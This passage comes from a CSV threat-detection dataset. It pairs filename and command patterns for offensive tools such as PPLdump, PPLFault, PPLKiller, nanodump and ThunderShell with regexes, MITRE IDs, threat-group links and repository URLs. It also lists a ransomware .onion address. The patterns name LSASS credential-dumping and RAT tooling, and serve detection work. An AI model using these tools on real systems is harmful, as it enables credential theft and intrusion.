- BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","55318"
"*ppenum.c*",".{0,1000}ppenum\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","N/A","2","115","9","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z","55320"
"*ppenum.exe*",".{0,1000}ppenum\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","N/A","2","115","9","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z","55321"
"*ppenum.x64.*",".{0,1000}ppenum\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","N/A","2","115","9","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z","55322"
"*ppenum.x86.*",".{0,1000}ppenum\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","N/A","2","115","9","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z","55323"
"*ppid_shellcode_spawn.bin*",".{0,1000}ppid_shellcode_spawn\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","55324"
"*ppidShellcodeSpawn4-cleaned.bin*",".{0,1000}ppidShellcodeSpawn4\-cleaned\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","55325"
"*ppidShellcodeSpawn-cleaned.bin*",".{0,1000}ppidShellcodeSpawn\-cleaned\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","55326"
"*PPIDSpoof.ps1*",".{0,1000}PPIDSpoof\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","55327"
"*ppl* --elevate-handle *.dmp*",".{0,1000}ppl.{0,1000}\s\-\-elevate\-handle\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","55328"
"*ppl_dump.x64*",".{0,1000}ppl_dump\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","N/A","10","10","140","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z","55329"
"*ppl_medic_dll.*",".{0,1000}ppl_medic_dll\..{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","55330"
"*PPLBlade.dmp*",".{0,1000}PPLBlade\.dmp.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access","https://github.com/tastypepperoni/PPLBlade","1","1","N/A","N/A","10","6","545","59","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z","55331"
"*PPLBlade.exe*",".{0,1000}PPLBlade\.exe.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access","https://github.com/tastypepperoni/PPLBlade","1","1","N/A","N/A","10","6","545","59","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z","55332"
"*PPLBlade-main.*",".{0,1000}PPLBlade\-main\..{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access","https://github.com/tastypepperoni/PPLBlade","1","1","N/A","N/A","10","6","545","59","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z","55333"
"*ppldump *",".{0,1000}ppldump\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/PPLDump_BOF","1","0","N/A","N/A","10","10","140","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z","55334"
"*PPLdump*",".{0,1000}PPLdump.{0,1000}","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","10","9","868","140","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z","55335"
"*PPLdump.exe*",".{0,1000}PPLdump\.exe.{0,1000}","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","10","9","868","140","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z","55336"
"*ppldump.py*",".{0,1000}ppldump\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","55337"
"*PPLDump_BOF.*",".{0,1000}PPLDump_BOF\..{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","N/A","10","10","140","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z","55338"
"*ppldump_embedded*",".{0,1000}ppldump_embedded.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","55339"
"*PPLdump64.exe*",".{0,1000}PPLdump64\.exe.{0,1000}","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","10","9","868","140","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z","55340"
"*PPLdumpDll*",".{0,1000}PPLdumpDll.{0,1000}","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","10","9","868","140","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z","55341"
"*PPLFault.*",".{0,1000}PPLFault\..{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","55342"
"*pplfault.cna*",".{0,1000}pplfault\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","N/A","2","140","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z","55343"
"*PPLFault.exe*",".{0,1000}PPLFault\.exe.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","55344"
"*PPLFaultDumpBOF*",".{0,1000}PPLFaultDumpBOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","N/A","2","140","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z","55345"
"*PPLFault-Localhost-SMB.ps1*",".{0,1000}PPLFault\-Localhost\-SMB\.ps1.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","55346"
"*PPLFault-Patch-Downgrade/Config.xml*",".{0,1000}PPLFault\-Patch\-Downgrade\/Config\.xml.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","1","N/A","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","55347"
"*PPLFaultPayload.dll*",".{0,1000}PPLFaultPayload\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","N/A","2","140","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z","55348"
"*PPLFaultPayload.dll*",".{0,1000}PPLFaultPayload\.dll.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","55349"
"*PPLFaultTemp*",".{0,1000}PPLFaultTemp.{0,1000}","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","N/A","2","140","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z","55350"
"*PPLFaultTemp*",".{0,1000}PPLFaultTemp.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","55351"
"*PPLKiller.exe*",".{0,1000}PPLKiller\.exe.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","N/A","10","10","933","139","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z","55352"
"*PPLKiller.sln*",".{0,1000}PPLKiller\.sln.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","N/A","10","10","933","139","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z","55353"
"*PPLKiller.vcxproj*",".{0,1000}PPLKiller\.vcxproj.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","N/A","10","10","933","139","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z","55354"
"*PPLKiller-master*",".{0,1000}PPLKiller\-master.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","N/A","10","10","933","139","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z","55355"
"*PPLmedicDll.def*",".{0,1000}PPLmedicDll\.def.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","55356"
"*PPLmedicDll.dll*",".{0,1000}PPLmedicDll\.dll.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","1","N/A","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","55357"
"*pplsystem.exe *",".{0,1000}pplsystem\.exe\s.{0,1000}","offensive_tool_keyword","PPLSystem","creates a livedump of the machine through NtDebugSystemControl to extract the COM secret and context, to then inject inside this process.","T1003.002","TA0006","N/A","N/A","Credential Access","https://github.com/Slowerzs/PPLSystem","1","0","N/A","N/A","10","2","190","23","2024-05-29T18:33:35Z","2024-05-22T17:48:49Z","55358"
"*PppEWCIgXbsepIwnuRIHtQLC*",".{0,1000}PppEWCIgXbsepIwnuRIHtQLC.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","LockBit","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","N/A","10","10","779","223","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z","55359"
"*ppypykatz.py*",".{0,1000}ppypykatz\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","55360"
"*ppzmaodrgtg7r6zcputdlaqfliubmmjpo4u56l3ayckut3nyvw6dyayd.onion*",".{0,1000}ppzmaodrgtg7r6zcputdlaqfliubmmjpo4u56l3ayckut3nyvw6dyayd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","55361"
